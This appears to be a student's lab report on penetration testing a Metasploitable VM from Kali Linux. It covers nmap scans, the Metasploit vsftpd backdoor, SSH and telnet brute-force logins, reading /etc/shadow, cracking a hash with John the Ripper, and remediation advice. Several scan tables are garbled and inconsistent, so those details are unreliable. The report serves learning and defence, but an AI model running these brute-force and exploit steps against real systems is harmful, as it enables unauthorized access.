Network Penetration Testing with Real-World Exploits and Security Remediation

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Introduction:

This project is based on performing penetration testing in a controlled lab environment to simulate attacks that hackers may use to exploit real systems. Using Kali Linux as the attack platform and Metasploitable as the vulnerable target system, I explore various stages of ethical hacking including scanning, enumeration, exploitation, privilege escalation, and remediation. The purpose is to gain hands-on experience in identifying, exploiting, and mitigating vulnerabilities responsibly.

Theory about the Project:

Network penetration testing is the process of evaluating a system's network security by simulating attacks from malicious outsiders and insiders. The goal is to find security loopholes before attackers do. It includes multiple phases:

- **Reconnaissance**: Gathering information about the target.
- Scanning & Enumeration: Actively probing to find open ports, services, and vulnerabilities.
- Exploitation: Gaining unauthorized access using known exploits.
- Post-Exploitation: Activities like privilege escalation or data access.
- Remediation: Providing security measures to patch vulnerabilities.

Project Requirements

- Two Operating Systems:
 - o Kali Linux (Attacker machine) o

Metasploitable (Target/vulnerable machine)

Tools Details:

Kali Linux	The attacker machine, containing preinstalled penetration testing tools.		
Metasploitable	A vulnerable machine to practice attacks on.		
nmap	For network scanning, port discovery, OS detection, and service version enumeration.		
Metasploit Framework	For exploiting known vulnerabilities in services running on the target.		
John the Ripper	For cracking hashed passwords obtained from /etc/shadow.		

Tasks

Network Scanning

Task 1: Basic Network Scan

O nmap -v 192.168.85.128

```
Discovered open port 2049/tcp on 192.168.85.129
Discovered open port 514/tcp on 192.168.85.129
 Discovered open port 2121/tcp on 192.168.85.129
 Discovered open port 6667/tcp on 192.168.85.129
 Discovered open port 1099/tcp on 192.168.85.129
 Completed SYN Stealth Scan against 192.168.85.129 in 0.17s (2 hosts left)
 Discovered open port 3306/tcp on 192.168.85.1
Completed SYN Stealth Scan against 192.168.85.254 in 6.12s (1 host left)
Completed SYN Stealth Scan at 08:27, 6.28s elapsed (3000 total ports)
Nmap scan report for 192.168.85.1
Host is up (0.0010s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE
3306/tcp open mysql
MAC Address: 00:50:56:C0:00:01 (VMware)
 Nmap scan report for 192.168.85.129
Host is up (0.0012s latency).
Not shown: 977 closed tcp ports (reset)
Not shown: 977 closed tcp po
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
53/tcp open domain
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
512/tcp open exec
513/tcp open login
514/tcp open shell
1099/tcp open rmiregistry
1524/tcp open ingreslock
2049/tcp open nfs
2121/tcp open nfs
2121/tcp open shell
5432/tcp open mysql
5432/tcp open postgresql
5900/tcp open vnc
6000/tcp open x11
6667/tcp open irc
8009/tcp open ajp13
8180/tcp open unknown
MAC Address: 00:0C:29:30:69:
                STATE SERVICE
MAC Address: 00:0C:29:30:69:40 (VMware)
```

Task 1: Scanning for hidden Ports

nmap -v -p- 192.168.85.128

Output:

```
Completed SYN Stealth Scan at 08:35, 6.53s elapsed (65535 total p
Nmap scan report for 192.168.85.129
Host is up (0.0044s latency).
Not shown: 65504 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
53/tcp open domain
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
512/tcp open exec
513/tcp open login
514/tcp open shell
1099/tcp open rmiregistry
1524/tcp open ingreslock
2049/tcp open nfs
2121/tcp open ccproxy-ftp
3306/tcp open mysql
3632/tcp open distccd
5432/tcp open postgresql
5900/tcp open vnc
6000/tcp open X11
6200/tcp open lm-x
6667/tcp open irc
6697/tcp open ircs-u
8009/tcp open ajp13
8180/tcp open unknown
8787/tcp open msgsrvr
33034/tcp open unknown
34143/tcp open unknown
46874/tcp open unknown
51822/tcp open unknown
MAC Address: 00:0C:29:30:69:40 (VMware)
```

Total Hidden Ports = 7

List of hidden ports

- 1. 8787
- 2. 53204
- 3. 6697
- 4. 3632
- 5. 59437 6. 36588
- 7. 53452

Task 2: Service Version Detection

Nmap -v -sV 192.168.85.129 Output:

```
Completed NSE at 08:33, 8.01s elapsed Nmap scan report for 192.168.85.129 Host is up (0.0065s latency).
Not shown: 977 closed tcp ports (reset)
PORT STATE SERVICE VERSION
                                      VERSION
            open ftp
open ssh
                                        vsftpd 2.3.4
21/tcp
22/tcp
                                        OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp
            open telnet
                                        Linux telnetd
25/tcp
                                        Postfix smtpd
             open
                      smtp
                                     ISC BIND 9.4.2
Apache httpd 2.2.8 ((Ubuntu) DAV/2)
2 (RPC #100000)
            open domain
53/tcp
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp open exec
513/tcp open login?
514/tcp open shell
                                        netkit-rsh rexecd
514/tcp open shell Netkit rshd
1099/tcp open java-rmi GNU Classpath grmiregistry
1524/tcp open bindshell Metasploitable root shell
2049/tcp open nfs
2121/tcp open ftp
                                        2-4 (RPC #100003)
ProFTPD 1.3.1
3306/tcp open mysql
                                        MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
6000/tcp open X11
6667/tcp open irc
                      X11
                                         (access denied)
                                        UnrealIRCd
                                        Apache Jserv (Protocol v1.3)
Apache Tomcat/Coyote JSP engine 1.1
8009/tcp open ajp13
8180/tcp open http
MAC Address: 00:0C:29:30:69:40 (VMware)
Service Info: Hosts: metasploitable.localdomain, irc.Metasploitable.LAN;
```

Task 3: Operating System Detection

nmap -v -O 192.168.85.129 Output:

```
14/tcp open snell
               rmiregistry
1099/tcp open
1524/tcp open
               ingreslock
2049/tcp open
               nfs
2121/tcp open
               ccproxy-ftp
3306/tcp open
               mysql
5432/tcp open
               postgresql
5900/tcp open
               vnc
6000/tcp open
               X11
6667/tcp open
               irc
8009/tcp open
               ajp13
8180/tcp open
               unknown
MAC Address: 00:0C:29:30:69:40 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Uptime guess: 0.127 days (since Sun May 18 05:47:18 2025)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=202 (Good luck!)
IP ID Sequence Generation: All zeros
```

Task 3 - Enumeration

Target IP Address – 192.168.160.131

Operating System Details -

MAC Address: 00:0C:29:AB:A7:B8 (VMware)

Device type: general purpose

Running: Linux 2.6.X

OS CPE: cpe:/o:linux:linux_kernel:2.6

OS details: Linux 2.6.9 - 2.6.33

Services Version with open ports (LIST ALL THE OPEN PORTS EXCLUDING HIDDEN PORTS)

PORT	STATE	SERVICE VERSION
21/tcp	Open ftp	vsftpd 2.3.4
22/tcp	Open ssh	OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp	Open telnet	Linux telnetd
25/tcp	Open smtp	Postfix smtpd
53/tcp	Open domain	ISC BIND 9.4.2
80/tcp	Open http	Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp	Open netbios-ssn	2 (RPC #100000)
139/tcp		Samba smbd 3.X - 4.X (workgroup: WORKGROUP
445/tcp	Open netbios-ssn	Samba smbd 3.X - 4.X (workgroup: WORKGROUP
512/tcp	Open exec	netkit-rsh rexecd
514/tcp		OpenBSD or Solaris rlogind
514/tcp	Open login	GNU Classpath grmiregistry
1099/tcp	Open tcpwrapped	Metasploitable root shell
2049/tcp	Openjava-rmi	2-4 (RPC #100003)
2121/tcp	Open bindshell	ProFTPD 1.3.1
3306/tcp	open mysql	MySQL 5.0.51a-3ubuntu5
5432/tcp	open postgresql	PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp	open vnc	VNC (protocol 3.3)
6000/tcp	open X11	(access denied
6667/tcp	open irc	unrealiRCd

8009/tcp	Open ajp13	Apache jserv (protocol v1.3)	
8180/tcp	Open http	Apache Tomcat/coyote jsp	
		engine 1.1	

Hidden Ports with Service Versions

Port State Service Version / Details

8787/tcp open drb Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)

3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))

6697/tcp open irc UnrealIRCd

35851/tcp open mountd NFS mount daemon 1-3 (RPC #100005)

36571/tcp open nlockmgr Network Lock Manager 1-4 (RPC #100021)

44585/tcp open java-rmi GNU Classpath grmiregistry

51228/tcp open status NFS status monitor 1 (RPC #100024)

Task 4- Exploitation of services

- 1. vsftpd 2.3.4 (Port 21 FTP)
 - O msfconsole
 - O use vsftpd 2.3.4
 - O show options
 - **O** set RHOST 192.168.85.129
 - O run

```
# Name
                                      Disclosure Date
                                                    Rank
                                                              Check Description
                                                                     VSFTPD v2.3.4
  0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03
                                                    excellent No
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/
msf6 > use 0
 No payload configured, defaulting to cmd/unix/interact
                                                    ) > set rhosts 192.168
msf6 exploit(
rhosts ⇒ 192.168.85.129
                                     234_backdoor) > show options
msf6 exploit(
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
               Current Setting
                                     Required Description
    Name
                                                 The local client address
The local client port
A proxy chain of format
    CHOST
    CPORT
                                     no
    Proxies
                                     no
               192.168.85.129
                                                  The target host(s), see
    RHOSTS
                                     yes
    RPORT
                                     yes
                                                  The target port (TCP)
msf6 exploit(unix/ftp/
```

2. OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)(port 22)

- O Search ssh
- O Use auxiliary/scanner/ssh/ssh login
- O Show options
- O Set RHOSTS 192.168.85.129
- O Set VERBOSE true
- O Set USER_FILE /desktop/sshlogid.txt
- O Set PASS FILE /desktop/sshpass.txt
- O Set STOP_IN_SUCCESS true O Run

<u>msf6</u> > search ssh

```
msf6 auxiliary(scanner/ssh/ssh_login) > set rhosts 92.168.85.129
rhosts ⇒ 92.168.85.129
msf6 auxiliary(scanner/ssh/ssh_login) > set verbose true
verbose ⇒ true
msf6 auxiliary(scanner/ssh/ssh_login) > set USER_FILE /desktop/sshlogid.txt
USER_FILE ⇒ /desktop/sshlogid.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set PASS_FILE /desktop/sshpass.txt
PASS_FILE ⇒ /desktop/sshpass.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS ⇒ true
msf6 auxiliary(scanner/ssh/ssh_login) > show options
```

```
msf6 auxiliary(scanner/ssh/ssh_login) > sessions -i 1
[*] Starting interaction with 1...
uname -r
2.6.24-16-server
whoami
msfadmin
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
pwd
/home/msfadmin
ls
vulnerable
```

3 Linux telnetd (port 23)

- O Search telnet
- Use auxiliary/scanner/telnet/telnet_login
- O Show options
- O Set RHOSTS 192.168.85.129
- O Set VERBOSE true
- Set USER_FILE /desktop/sshlogid.txt
- O Set PASS FILE /desktop/sshpass.txt
- O Set STOP IN SUCCESS true
- O Run

msf6 > search telnet

72 auxiliary/scanner/telnet/telnet_login

msf6 > use 72
msf6 auxiliary(scanner/telnet/telnet_login) > show options

Madula antique (ammiliamulacampam/talact/talact lagin).

```
msf6 auxiliary(scanner/telnet/telnet_login) > set rhosts 192.168.85.129
rhosts ⇒ 192.168.85.129
msf6 auxiliary(scanner/telnet/telnet_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS ⇒ true
msf6 auxiliary(scanner/telnet/telnet_login) > set USERPASS_FILE /home/kali/Desktop/telnet
USERPASS_FILE ⇒ /home/kali/Desktop/telnetid.txt
msf6 auxiliary(scanner/telnet/telnet_login) > set PASS_FILE /home/kali/Desktop/telnetpass
PASS_FILE ⇒ /home/kali/Desktop/telnetpass.txt
msf6 auxiliary(scanner/telnet/telnet_login) > show options
```

Module options (auxiliary/scanner/telnet/telnet_login):

Name	Current Setting	Required	Description
ANONYMOUS_LOGIN	false	yes	Attempt to login with a
BLANK_PASSWORDS	false	no	Try blank passwords for
BRUTEFORCE_SPEED		yes	How fast to bruteforce,
CreateSession	true	no	Create a new session fo
DB_ALL_CREDS	false	no	Try each user/password
DB_ALL_PASS	false	no	Add all passwords in th
DB_ALL_USERS	false	no	Add all users in the cu
DB_SKIP_EXISTING	none	no	Skip existing credentia alm)
PASSWORD		no	A specific password to
PASS_FILE	/home/kali/Desktop/telnetpass.txt	no	File containing passwor
RHOSTS	192.168.85.129	yes	The target host(s), see metasploit.html
RPORT	/23 c/s tare/doc/*/@dpy/igit:	yes	The target port (TCP)
STOP_ON_SUCCESS	true	yes	Stop guessing when a cr
THREADS	SILUTELY NO WARRANTY, to the extent	yes	The number of concurren
USERNAME		no	A specific username to
USERPASS_FILE	/home/kali/Desktop/telnetid.txt	no	File containing users a
USER_AS_PASS	false	no	Try the username as the
USER_FILE		no	File containing usernam
VERBOSE	true	yes	Whether to print output

View the full module info with the info, or info -d command.

```
metasploitable login: msfadmin
Password:
Last login: Sun May 18 07:06:41 EDT 2025 on pts/1
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
No mail.
msfadmin@metasploitable:~$ ls
vulnerable
msfadmin@metasploitable:~$ uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
msfadmin@metasploitable:~$ pwd
/home/msfadmin
msfadmin@metasploitable:~$
```

Task 5- Create user with root permission

- O Adduser abhikumar
- O Password 1234
- O Cat /etc/passwd
- O abhishek:x:1003:1003:y,,,:/home/abhishek:/bin/bash O Cat /etc/shadow

• abhishek:\$1\$K.gPKFpE\$RBEjcaVsrPJq0smj/.P2L1:20225:0:99999:7:::

Task 6 – Cracking password hashes

O nano abhishek

```
(abhi® kali)-[~]
$ cat abhishek
abhikumar:$1$SklLMØJl$eVs9Nn4.XXJ816et2hW9l.
```

O john abhishek –show

```
(abhi@kali)-[~]

$ john abhishek -- show

abhikumar:1234

1 password hash cracked, 0 left
```

Task 6 -Remediation

Here is your content reformatted neatly under the requested structure for a vulnerability assessment report:

1. vsftpd 2.3.4 (Port 21 - FTP)

Service: FTP

Current Version: vsftpd 2.3.4

Latest Version: vsftpd 3.0.5 (as of 2025)

Vulnerability:

vsftpd 2.3.4 contains a **backdoor vulnerability** that allows attackers to gain a **root shell** when a specially crafted payload is sent. This is a **critical vulnerability** in the vsftpd service.

CVE ID:

CVE-2011-2523

Impact:

Allows unauthorized root shell access via port 6200.

- Remediation:
 - o **Option 1**: Upgrade to the latest version (vsftpd 3.0.5)

 Option 2: Disable FTP entirely and switch to more secure alternatives such as SFTP (SSH-based)

• Reference:

YouTube Exploit Demo

2. OpenSSH 4.7p1 Debian 8ubuntu1 (Protocol 2.0) (Port 22)

Service: SSH

• Current Version: OpenSSH 4.7p1 • Latest Version: OpenSSH 9.x+ (as of 2025)

Vulnerabilities:

- May be susceptible to information disclosure, brute-force login attempts, or misconfiguration risks.
- Older versions like 4.7p1 may lack modern encryption protocol support and protections against modern attacks.

CVE Examples:

- CVE-2008-1483 Race condition in sshd
 CVE-2008-4109 Denial of Service
 via crafted SSH key
- o General issues with outdated OpenSSH versions

· Impact:

Attackers may exploit outdated configurations or weak passwords, leading to unauthorized access.

Remediation:

- Upgrade to the latest version of OpenSSH (v9.x or later)
 Disable root login
 Over SSH
 Use public key authentication and enforce strong password
 policies
- o Implement fail2ban to block repeated brute-force attempts
- Reference: OpenSSH CVE List

3. Linux telnetd (Port 23 - Telnet)

• **Service**: Telnet

• Current Version: telnetd (unspecified Linux version)

Status: Deprecated and insecure protocol used for remote terminal access

Vulnerabilities:

- Transmits credentials and session data in plaintext

 Vulnerable to

 MITM (Man-in-the-Middle) attacks

 Lacks proper authentication and
 encryption
- o Subject to session hijacking

CVE Examples:

 CVE-1999-0611 – Telnet service allows remote attackers to access without proper authentication.
 CVE-1999-0650 – Telnet service with weak or no access control

Impact:

Attackers on the same network can sniff credentials or hijack sessions.

Remediation:

- Disable Telnet service permanently
- Use SSH (Secure Shell) as a secure alternative for remote terminal access
- Reference: CVE Telnet Info

Major Learning From this project

This project gave me practical experience in ethical hacking using Kali Linux and Metasploitable. I learned how to scan networks using **Nmap** to find open ports, detect services (-sV), and identify operating systems (-O). I explored and exploited vulnerable services like **vsftpd 2.3.4** using **Metasploit**, gaining insight into real-world attack techniques.

I also learned how Linux stores user data and how passwords can be cracked using **John the Ripper** with wordlists. Additionally, I understood the risks of outdated services like **Telnet** and **SSH** how to suggest remediation steps like upgrading software or disabling insecure services.

Overall, this project improved my understanding of system vulnerabilities and how to secure them effectively.